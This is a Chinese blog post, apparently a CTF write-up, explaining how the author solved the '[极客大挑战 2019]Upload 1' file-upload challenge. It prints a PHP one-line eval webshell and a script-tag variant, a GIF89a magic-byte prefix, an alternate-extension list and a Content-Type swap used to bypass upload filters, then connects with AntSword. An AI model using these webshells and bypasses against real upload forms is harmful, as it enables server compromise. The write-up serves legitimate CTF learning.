极客大挑战 2019 Upload 1题解

ctf-一句话木马 ctf-<?绕过

ctf

Publish Date: 2022-01-19

Update Date: 2022-08-29

Word Count: 231

Read Times: 1 Min

Read Count:

[极客大挑战 2019]Upload 1题解

GIF89a

http://xxxx/upload/文件名

php2, php3, php3, php5, phps, pht, phtm, phtml

<script language="php">eval($_REQUEST[kb])</script>

打开题目是文件上传，要求上传头像
写一个一句话木马

<?php @eval($_POST['kb']); ?>

直接上传，用burpsuite抓包，发现content-type，将其值改为image/jpeg，send发现
notphp
尝试将后缀改为phtml，发现
ban
将一句话木马改为

<script language="php">eval($_REQUEST[kb])</script>

重新提交，发现
notimage
猜测可能检查图片文件头，将一句话木马改为

GIF89a? <script language="php">eval($_REQUEST[kb])</script>

重新提交
success
猜测文件上传到/upload/文件名中，访问，找到文件。
利用蚁剑链接，在/中找到flag

kingkb

http://kingofkb.github.io/2022/01/19/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019%20Upload%201%E9%A2%98%E8%A7%A3/

All articles in this blog are used except for special statements CC BY 4.0 reprint policy. If reproduced, please indicate source kingkb !

ctf-一句话木马 ctf-<?绕过

管道符

2022-01-21 ctf

ctf-管道符

flask模板注入、SSTL模板注入

2022-01-18 ctf